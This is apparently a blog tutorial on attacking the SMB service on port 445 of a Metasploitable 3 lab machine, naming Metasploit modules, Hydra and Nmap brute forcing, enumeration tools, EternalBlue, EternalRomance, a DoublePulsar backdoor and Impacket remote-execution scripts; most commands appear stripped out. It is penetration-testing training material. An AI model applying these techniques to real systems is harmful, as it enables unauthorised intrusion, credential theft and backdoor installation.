Exploiting Port 445 – SMB
This port is used for the Server Message Block sharing files between different operating system i.e. Windows-Windows, Unix-Unix and Unix-windows.
While Port 139 is known technically as “NBT over IP”, Port 445 is “SMB over IP”. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
One of the first things you can ty is to brute force your access.
Brute forcing SMB using Metasploit
Try using the credentials already in the database:
Brute forcing SMB using Hydra
Create and use a custom list for users and passwords:
Brute forcing SMB using Nmap
Nmap could also be used to brute force the SMB service. Unfortunately, the smb-brute script is not working anymore…
Enumerating SMB using Metasploit
Several tools can be used to extract information from the target via the SMB service. As expected, Metasploit has a number of modules that be used on SMB to enumerate the remote machine:
You will get a significant amount of information:
- SMB versions supported (might be vulnerable);
- Shared drives (might be exploitable)
- Usernames (might be used to exploit other services)
- User Security Identifiers (might be used for exploitation)
Enumerating SMB using Nmap
Nmap has many NSE scripts that can be used against hosts where the SMB service is running, but not all of them return useful results:
Nmap can also be used as a light vulnerability scanner, with some specific scripts specially written for port 445 services.
Enumerating SMB using smbclient
There are several other tools available in Kali Linux to enumerate the SMS service.
You can use a tool called smbclient to connect to the Metasploitable 3 box, and list the available shares but you will need a valid username/password.
NOTE: In the current Kali version you will need to edit the /etc/samba/smb.conf to get the proper results.
Enumerating SMB using smbmap
These results from smbmap are critical because you can see that two of the shared folders are writable, therefore potentially exploitable.
Enumerating SMB using enum4linux
Patiently and using several tools you will get a lot of useful information about your target. There are other tools available but, in this case, they return absolutely nothing.
After the enumeration, and using the information retrieved, you can now get to exploit your target via the SMB
Exploiting SMB using Metasploit
MSF has a number of modules available to exploit SMB
Windows Authenticated User Code Execution
This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. The module is similar to the “psexec” utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.
Authenticated PowerShell Command Execution
The old psexec_psh is now deprecated but you can have its functionality by selecting a different target on the psexec module (Target 1-PowerShell). This option will use a valid administrator username and password to execute a PowerShell payload using a similar technique to the “psexec” utility provided by SysInternals. The payload is encoded in base64 and executed from the command line using the –encoded command flag. Using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature-based detection.
Windows Authenticated Administration Utility
This module uses a valid administrator username and password to execute an arbitrary command on one or more hosts, using a similar technique than the “psexec” utility provided by SysInternals. Daisy chaining commands with ‘&’ doesn’t work so don’t waste your time trying. This module is useful because it doesn’t need to upload any binaries to the target machine.
This is in fact a two-stage attack:
- First you use a module (web delivery) to get malicious DLL code which you can use as an arbitrary command on the host.
- Select the appropriate target (Target 3-Regsvr32) and payload
- Then you use another module (psexec_command) to inject the previous code in the remote machine.
As soon as you run auxiliary module psexec_command you will get a Meterpreter session with system privileges.
Impacket WMI Exec
Impacket is a collection of Python classes and functions for working with various Windows network protocols. It is a centerpiece of many different pentesting tools. Apart from being a library, it also contains number of examples which we can use right away for remote command execution.
The following table provides summary of all discussed Impacket Remote Code Execution methods:
Method | RCE type | Port(s) used |
psexec.py | interactive shell | tcp/445 |
dcomexec.py | semi-interactive shell | tcp/135 tcp/445 tcp/49751 (DCOM) |
smbexec.py | semi-interactive shell | tcp/445 |
wmiexec.py | semi-interactive shell | tcp/135 tcp/445 tcp/50911 (Winmgmt) |
atexec.py | command | tcp/445 |
This module uses a similar approach to psexec but executing commands through WMI.
Unfortunately, this module doesn’t work in the current Kali release due to Python syntax incompatibilities. The previous image was obtained using Kali 2019.1.
Impacket DCOM Exec
A different approach is to use DCOM to execute remote commands, like creating a user or anything else:
Unfortunately, this module also doesn’t work in the current Kali release. But there is another module that tries to dump hashes from the remote machine without executing any agent there.
Other Metasploit modules
There are other modules created to attack the SMB service, but they require some social engineering because the target needs to access a share on the attacker machine:
- NTLM Capture (auxiliary/server/capture/smb)
- This module provides an SMB service that can be used to capture the challenge-response password hashes of SMB client system.
- Need to run in coordination with auxiliary/spoof/nbns/nbns_response
- DoS (auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop)
- It will just crash the remote machine
Eternal Romance Exploit
Eternal Romance is one of the SMBv1 exploits from the leaked NSA exploit collection. This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done:
Check if target is vulnerable:
Exploit:
It is also possible to use the web delivery method to exploit this vulnerability:
- Run the exploit/multi/script/web_delivery module (set Target 3-Regsvr32)
- Get a command
- Run the auxiliary/admin/smb/ms17_010_command module
- Use the previous command
- Get a meterpreter shell
Eternal Blue Exploit
Eternal Blue is the exploit used to launch the famous WannaCry ransomware attack. Try using Nmap to check for this vulnerability:
Exploit:
Double Pulsar Exploit
You can deploy a backdoor to the remote machine. First, clone the appropriate GitHub repository:
NOTE: You need to install wine32 before running this script
- dpkg --add-architecture i386
- apt-get update
- apt-get install -y wine32
Deploy the backdoor:
Exploit using Metasploit
Exploiting SMB using Impacket
The psexec.py script lets you execute processes on remote windows systems, copy files on remote systems, process their output and stream it back. It allows execution of remote shell commands directly with the full interactive console without having to install any client software.
The smbexec.py method takes advantage of the native Windows SMB functionality to execute arbitrary commands on the remote system. This approach does not require anything to be uploaded on the remote system and is therefore somewhat less prone to detection.
The wmiexec.py script uses Windows Management Instrumentation (WMI) interface of the remote Windows system to spawn a semi-interactive shell. Similarly as dcomexec method, wmiexec requires communication over 3 network ports / services.
First it uses ports tcp/135 and tcp/445, and ultimately it communicates with the Winmgmt Windows service over dynamically allocated high port such as tcp/50911. This makes the wmiexec method more noisy than the other methods.
There are other Impacket scripts, not all of them allowing RCE but some of them potentially very useful against a Domain Controller. You can find them at /usr/share/doc/python3-impacket/examples
2 comments:
where you got /usr/share/wordlists/Metasploitable3Win_user.txt
ur ann
Post a Comment